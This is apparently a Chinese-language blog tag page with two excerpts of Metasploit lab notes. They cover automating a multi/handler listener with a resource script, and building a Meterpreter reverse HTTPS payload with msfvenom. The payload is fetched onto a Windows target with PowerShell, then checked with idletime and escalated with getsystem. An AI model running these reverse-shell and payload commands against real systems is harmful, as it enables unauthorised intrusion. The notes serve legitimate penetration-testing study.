發表文章

目前顯示的是有「Metasploit」標籤的文章

自動化 Metasploit

圖片
 自動化 Metasploit 先執行 Metasploit 然後啟動多/處理程序模組 use exploit/multi/handler set PAYLOAD windows/meterpreter_reverse_https set LHOST 192.168.45.208 set LPORT 443 接著配置 AutoRunScript 選項,以便在建立會話後自動執行模組 此範例,我們使用 post/windows/manage/migrate 模組。 這將導致產生的 Meterpreter 自動啟動後台 notepad.exe 進程並遷移到它 接著將 ExitOnSession 設為 false,以確保偵聽器在建立工作階段後繼續接受新連線 最後添加帶有參數 -z 和 -j 的 run,以將其作為後台作業運行,並阻止我們自動與會話互動 set AutoRunScript post/windows/manage/migrate set ExitOnSession false run -z -j 現在,讓我們儲存腳本,建立一個 listener.rc 將上述指令通通包進去 輸入 msfconsole 並將資源腳本作為 -r 的參數來啟動 Metasploit 指令 sudo msfconsole -r listener.rc 跟上述手動執行結果一樣,啟動後直接 listen 443 一樣透過 met.exe 看到自動連到 443,然後腳本自動執行 migrate 到記事本了 上述是我們自己建立的一個腳本,事實上在 Metasploit 中有許多自動化的腳本位於 Metasploit 目錄的 script/resource/ 目錄中可供直接使用 └─$ ls -l /usr/share/metasploit-framework/scripts/resource 設定 RHOST 時使用 set RHOST 但若要設定全域設定可以用 setg RHOST,取消是 unsetg RHOST portscan.rc 掃描的第一個 Port 是 7 └─$ cat /usr/share/metasploit-framework/scripts/resource/portscan.rc 練習 3 靶機 192.168.186.225/226 有一...

Meterpreter 核心利用後功能與模組暨旋轉

圖片
 Meterpreter 核心利用後功能與模組暨旋轉 攻擊機 192.168.45.242 靶機 192.168.186.223(Windows) 建立一個 payload 名稱為 met.exe 如下 msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.242 LPORT=443 -f exe -o met.exe sudo msfconsole -q 啟動  Metasploit search multi handler 並選擇 5 (use 5) use 5 後 show options 看一下如下圖,payload 是 generic/shell_reverse_tcp 先將 payload 改成 windows/x64/meterpreter_reverse_https 指令 set payload windows/x64/meterpreter_reverse_https 再 show options 看一下必要的欄位 set LHOST 192.168.45.242 & set LPORT 443 執行 run,可以看到攻擊機在本機的 443 Port 上執行了 reverse handler 假設 Windows 靶機已經有一個 4444 連線 shell   下載我們一開始建立的 met.exe,指令如下,啟動 powershell 然後 iwr 下載再 dir 看一下 powershell iwr -uri http://192.168.45.242/met.exe -Outfile met.exe dir 執行 payload met.exe 剛剛建立的 443 listen 進來了,執行 idletime 看一下閒置時間 上圖輸出表示使用者已經 27 分 14 秒沒有與系統交互,這表示使用者可能已經離開了電腦 如果 idletime 指令的結果顯示使用者離開,我們可以以此為契機執行可能會短暫顯示命令列視窗(例如CMD或PowerShell)的程式或指令。 對於幾個後利用功能,我們需要管理權限才能執行它們。 Metasploit 包含指令 getsystem,該指令嘗試自動將我們的權限提升到 NT ...